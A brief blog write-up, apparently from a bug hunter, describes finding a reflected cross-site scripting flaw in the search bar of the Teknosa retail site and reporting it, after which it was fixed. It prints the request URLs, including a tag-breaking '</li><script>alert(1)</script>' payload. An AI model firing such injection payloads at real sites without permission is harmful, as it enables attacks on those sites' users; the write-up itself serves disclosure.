XSS in Teknosa Write-up (less than 5 minutes)

    Hi everyone, This is a write-up. I will tell my bug reports. Therefore, I think that I should start with easy bug.
  I tried search bar for xss like everbody. 

Request: 
https://www.teknosa.com/arama/?s=</>alert()
Response (view-source):
...<li></>alert()</li>...
 I tried this payload:
<script>alert(1)</script>
but this payload did not trigger XSS and I tried again it with </li>.

Request:
https://www.teknosa.com/arama/?s=</li><script>alert(1)</script>
Response:
and I reported to Teknosa with mail. They fixed this vulnerability but they didn't even congratulate me.



at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)